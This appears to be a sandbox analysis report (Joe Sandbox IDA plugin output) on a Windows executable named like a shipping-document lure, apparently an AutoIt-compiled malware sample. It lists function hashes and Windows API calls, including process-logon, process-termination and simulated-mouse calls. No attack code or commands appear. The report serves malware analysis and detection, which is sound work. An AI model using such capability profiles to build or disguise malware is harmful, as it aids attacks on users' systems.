                                                                • String ID:
                                                                • API String ID: 4046560759-0
                                                                • Opcode ID: fda15b3af92a314381ddb40e6302469dc5437d75dae4dd626aea226f8a9df580
                                                                • Instruction ID: e332f188b810cead0f68e870318b65fc6490ff8c4b8a5aaa5b084b7a9852b558
                                                                • Opcode Fuzzy Hash: fda15b3af92a314381ddb40e6302469dc5437d75dae4dd626aea226f8a9df580
                                                                • Instruction Fuzzy Hash: CA512771108204AFC714EB64C999EAFBBE9EFC9324F04491DF4558B2A2DB31E909CB52
                                                                APIs
                                                                • GetMenu.USER32(?), ref: 009B57FB
                                                                • GetMenuItemCount.USER32(00000000), ref: 009B5832
                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009B585A
                                                                • GetMenuItemID.USER32(?,?), ref: 009B58C9
                                                                • GetSubMenu.USER32(?,?), ref: 009B58D7
                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 009B5928
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountMessagePostString
                                                                • String ID:
                                                                • API String ID: 650687236-0
                                                                • Opcode ID: e70bb42db54ab11cb5ccfa0fc4677881da0a9e1746f2a9cb64d243d40e35d54c
                                                                • Instruction ID: 8c749ac6c82633053de88fae41674ff648c92a378ff5145a81bc6b692a0663ef
                                                                • Opcode Fuzzy Hash: e70bb42db54ab11cb5ccfa0fc4677881da0a9e1746f2a9cb64d243d40e35d54c
                                                                • Instruction Fuzzy Hash: F2515835A00615AFCF11EF64C945AAEBBB4EF88320F114469E916AB351CB74AE418B90
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0098EF06
                                                                • VariantClear.OLEAUT32(00000013), ref: 0098EF78
                                                                • VariantClear.OLEAUT32(00000000), ref: 0098EFD3
                                                                • _memmove.LIBCMT ref: 0098EFFD
                                                                • VariantClear.OLEAUT32(?), ref: 0098F04A
                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0098F078
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                • String ID:
                                                                • API String ID: 1101466143-0
                                                                • Opcode ID: a3691f500f7ab939f98f1269243fdcea6253cfb692506bf66c175c3a8e579b6b
                                                                • Instruction ID: 2d89e7ba7604f22420f9f9b60b473fdf77057385933f6e08f6d05ef0362752d8
                                                                • Opcode Fuzzy Hash: a3691f500f7ab939f98f1269243fdcea6253cfb692506bf66c175c3a8e579b6b
                                                                • Instruction Fuzzy Hash: 305168B5A00209EFCB14DF58C894AAAB7B9FF4C314B15856AED59DB301E334E911CFA0
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992258
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009922A3
                                                                • IsMenu.USER32(00000000), ref: 009922C3
                                                                • CreatePopupMenu.USER32 ref: 009922F7
                                                                • GetMenuItemCount.USER32(000000FF), ref: 00992355
                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00992386
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                • String ID:
                                                                • API String ID: 3311875123-0
                                                                • Opcode ID: 9167a791557af6ac6dc4c709da622348c5b6b209ef1bfb73f765f60798eb77a9
                                                                • Instruction ID: 506f705438e9e13133b8baf95a41bd5bf56beebc79d7e7d7f5fb6b6ba229989d
                                                                • Opcode Fuzzy Hash: 9167a791557af6ac6dc4c709da622348c5b6b209ef1bfb73f765f60798eb77a9
                                                                • Instruction Fuzzy Hash: 9E51CF3060420AFFDF21CF6CD989BADBBF9BF45714F204629E811A7290E3799944CB61
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0093179A
                                                                • GetWindowRect.USER32(?,?), ref: 009317FE
                                                                • ScreenToClient.USER32(?,?), ref: 0093181B
                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0093182C
                                                                • EndPaint.USER32(?,?), ref: 00931876
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                • String ID:
                                                                • API String ID: 1827037458-0
                                                                • Opcode ID: 951ace4a56af74d5858c71b7ca0f66c168eb2e87849371d6f5d10bb3432dc1e8
                                                                • Instruction ID: 10c42d4007e5768b4d03a04d84198308df4faff9c5c31ed160fd3ac6eb292c4e
                                                                • Opcode Fuzzy Hash: 951ace4a56af74d5858c71b7ca0f66c168eb2e87849371d6f5d10bb3432dc1e8
                                                                • Instruction Fuzzy Hash: 7041AB31508700AFD710DF28CC84FBA7BE8EB49724F044629FAA58B2B1D7309845EB62
                                                                APIs
                                                                • ShowWindow.USER32(009F57B0,00000000,00E85388,?,?,009F57B0,?,009BB5A8,?,?), ref: 009BB712
                                                                • EnableWindow.USER32(00000000,00000000), ref: 009BB736
                                                                • ShowWindow.USER32(009F57B0,00000000,00E85388,?,?,009F57B0,?,009BB5A8,?,?), ref: 009BB796
                                                                • ShowWindow.USER32(00000000,00000004,?,009BB5A8,?,?), ref: 009BB7A8
                                                                • EnableWindow.USER32(00000000,00000001), ref: 009BB7CC
                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 009BB7EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Show$Enable$MessageSend
                                                                • String ID:
                                                                • API String ID: 642888154-0
                                                                • Opcode ID: a84cf66461f54a2a430bb559a8b04589752f478b97c5ebcf915adfb3700361c8
                                                                • Instruction ID: 0f1242a552ce75dc9c969401e1e62306713198c9ccc21ae13d3061c5fa68d06b
                                                                • Opcode Fuzzy Hash: a84cf66461f54a2a430bb559a8b04589752f478b97c5ebcf915adfb3700361c8
                                                                • Instruction Fuzzy Hash: 13416074604244AFDB21CF24CAD9BD47BE5FB45320F1841B9E9488FAA2CBB1A956CB50
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,009A4E41,?,?,00000000,00000001), ref: 009A70AC
                                                                  • Part of subcall function 009A39A0: GetWindowRect.USER32(?,?), ref: 009A39B3
                                                                • GetDesktopWindow.USER32 ref: 009A70D6
                                                                • GetWindowRect.USER32(00000000), ref: 009A70DD
                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009A710F
                                                                  • Part of subcall function 00995244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009952BC
                                                                • GetCursorPos.USER32(?), ref: 009A713B
                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009A7199
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                • String ID:
                                                                • API String ID: 4137160315-0
                                                                • Opcode ID: a89832f12dd3e63cae2b438b4d4b560f07a88d185dabed97333ee89c10e382b2
                                                                • Instruction ID: 58689ed308efb85661825fd042c72c67d1f9e06a9301a66b6571f9a1d56b34f1
                                                                • Opcode Fuzzy Hash: a89832f12dd3e63cae2b438b4d4b560f07a88d185dabed97333ee89c10e382b2
                                                                • Instruction Fuzzy Hash: BA31AF72509305ABD720DF54CC49B9BBBEAFB89314F000A29F59997191CA70EA09CBD2
                                                                APIs
                                                                  • Part of subcall function 009880A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009880C0
                                                                  • Part of subcall function 009880A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009880CA
                                                                  • Part of subcall function 009880A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009880D9
                                                                  • Part of subcall function 009880A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009880E0
                                                                  • Part of subcall function 009880A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009880F6
                                                                • GetLengthSid.ADVAPI32(?,00000000,0098842F), ref: 009888CA
                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009888D6
                                                                • HeapAlloc.KERNEL32(00000000), ref: 009888DD
                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 009888F6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0098842F), ref: 0098890A
                                                                • HeapFree.KERNEL32(00000000), ref: 00988911
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                • String ID:
                                                                • API String ID: 3008561057-0
                                                                • Opcode ID: 8c05a8b97be4499dfb5448f188b8d109b12f07ca9bd50ce653de2d84af54225d
                                                                • Instruction ID: e0036f178448bb82163181e7eb59e0bc8b8a27423ad6b033089f8f958e04f753
                                                                • Opcode Fuzzy Hash: 8c05a8b97be4499dfb5448f188b8d109b12f07ca9bd50ce653de2d84af54225d
                                                                • Instruction Fuzzy Hash: 7211AF71525209FFDB10AFA8DD19BBF776DEB44321F904528E845D7210CB369D00DB60
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009885E2
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 009885E9
                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009885F8
                                                                • CloseHandle.KERNEL32(00000004), ref: 00988603
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00988632
                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00988646
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                • String ID:
                                                                • API String ID: 1413079979-0
                                                                • Opcode ID: 558eaa0b2700e8150d0bd41c6bc634bfb02e1d51ad37f55f4d330e58f0f2e2a6
                                                                • Instruction ID: 8e4e9fc479697fad69a07c25d84935b864895ce0f8e7c9408f44251d272dcce6
                                                                • Opcode Fuzzy Hash: 558eaa0b2700e8150d0bd41c6bc634bfb02e1d51ad37f55f4d330e58f0f2e2a6
                                                                • Instruction Fuzzy Hash: 6A11597250420DABDF019FA8DD49BEF7BA9EF08354F044164FE04A2260C7768D60EB60
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 0098B7B5
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0098B7C6
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0098B7CD
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0098B7D5
                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0098B7EC
                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0098B7FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CapsDevice$Release
                                                                • String ID:
                                                                • API String ID: 1035833867-0
                                                                • Opcode ID: 2f0c36633fb52330e2ee8edc88cec7b95639594ff191437a56abe76b93e5b6b6
                                                                • Instruction ID: 7d4c9281d705327f714571b255e6d2349ac1310c1a2ace2e7af5681add7072ef
                                                                • Opcode Fuzzy Hash: 2f0c36633fb52330e2ee8edc88cec7b95639594ff191437a56abe76b93e5b6b6
                                                                • Instruction Fuzzy Hash: C4017175A04309BBEF10ABE69D45F5EBFA8EB48321F044165FE04A7291D6309C00CF90
                                                                APIs
                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00950193
                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0095019B
                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009501A6
                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009501B1
                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 009501B9
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 009501C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Virtual
                                                                • String ID:
                                                                • API String ID: 4278518827-0
                                                                • Opcode ID: 8361c506def4fcd662fcbaecd4fcfb58f970e75e250c4514ca0d069c577f0f55
                                                                • Instruction ID: eb7d21216534ce6b27a10a0d4d969e34e614282ebb7c5df053d54d7b04809558
                                                                • Opcode Fuzzy Hash: 8361c506def4fcd662fcbaecd4fcfb58f970e75e250c4514ca0d069c577f0f55
                                                                • Instruction Fuzzy Hash: A8016CB0901759BDE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009953F9
                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0099540F
                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0099541E
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099542D
                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00995437
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099543E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 839392675-0
                                                                • Opcode ID: a43078f3e694e1fc27bac836fa1a19051559bf964ef298ddcb32a46eec8a5700
                                                                • Instruction ID: b95d890d7a7c44495b51b78645152bb22b1c35d4357fc690f348f418ddae15b4
                                                                • Opcode Fuzzy Hash: a43078f3e694e1fc27bac836fa1a19051559bf964ef298ddcb32a46eec8a5700
                                                                • Instruction Fuzzy Hash: 8CF09032658558FBE7215BA6DD0DEEF7B7CEFCAB21F000269FA04D1060D7A01A0197B5
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00997243
                                                                • EnterCriticalSection.KERNEL32(?,?,00940EE4,?,?), ref: 00997254
                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00940EE4,?,?), ref: 00997261
                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00940EE4,?,?), ref: 0099726E
                                                                  • Part of subcall function 00996C35: CloseHandle.KERNEL32(00000000,?,0099727B,?,00940EE4,?,?), ref: 00996C3F
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00997281
                                                                • LeaveCriticalSection.KERNEL32(?,?,00940EE4,?,?), ref: 00997288
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 3495660284-0
                                                                • Opcode ID: c87ef416ec47efcabe09abdd23187ec4bd52d8330dbf0547055fe9a2e2d20e35
                                                                • Instruction ID: a1d68a7b43ecb6bdd7ee1196e5f0c1039ff1781817a1e040c03f369274addf27
                                                                • Opcode Fuzzy Hash: c87ef416ec47efcabe09abdd23187ec4bd52d8330dbf0547055fe9a2e2d20e35
                                                                • Instruction Fuzzy Hash: 8AF05E36568612EBEB121B68EE5CADA7729EF45722B100631F613950A0DB765801DB60
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0098899D
                                                                • UnloadUserProfile.USERENV(?,?), ref: 009889A9
                                                                • CloseHandle.KERNEL32(?), ref: 009889B2
                                                                • CloseHandle.KERNEL32(?), ref: 009889BA
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009889C3
                                                                • HeapFree.KERNEL32(00000000), ref: 009889CA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                • String ID:
                                                                • API String ID: 146765662-0
                                                                • Opcode ID: 3588ec3162bafa1f372d1712880eb8bd645f2bd19043f4ca62e1f264e748774b
                                                                • Instruction ID: d90d7f4395dec1be76e2780bd80250268511ca974abe4f53e3ab2d149e5ab60d
                                                                • Opcode Fuzzy Hash: 3588ec3162bafa1f372d1712880eb8bd645f2bd19043f4ca62e1f264e748774b
                                                                • Instruction Fuzzy Hash: 15E0C276018401FBDA011FE5EE1C90ABBA9FB89372B148730F21981070CB329420EB50
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 009A8613
                                                                • CharUpperBuffW.USER32(?,?), ref: 009A8722
                                                                • VariantClear.OLEAUT32(?), ref: 009A889A
                                                                  • Part of subcall function 00997562: VariantInit.OLEAUT32(00000000), ref: 009975A2
                                                                  • Part of subcall function 00997562: VariantCopy.OLEAUT32(00000000,?), ref: 009975AB
                                                                  • Part of subcall function 00997562: VariantClear.OLEAUT32(00000000), ref: 009975B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                • API String ID: 4237274167-1221869570
                                                                • Opcode ID: ba430d7d577dda02efcb0a14af51e34e08e19e82270631c544417b4fd12a5ca2
                                                                • Instruction ID: 40928e2387452d24479634030a2f59bdc9da91ff166c542bb4fa0f2ddd0bbadb
                                                                • Opcode Fuzzy Hash: ba430d7d577dda02efcb0a14af51e34e08e19e82270631c544417b4fd12a5ca2
                                                                • Instruction Fuzzy Hash: 95915C756083019FCB10DF28C485A5BBBE8EFCA714F14496DF89A9B361DB31E905CB92
                                                                APIs
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • _memset.LIBCMT ref: 00992B87
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00992BB6
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00992C69
                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00992C97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                • String ID: 0
                                                                • API String ID: 4152858687-4108050209
                                                                • Opcode ID: df93748df28026e120bd50aa8452f589aae65c302aa32c187c5f8769bf2b3d95
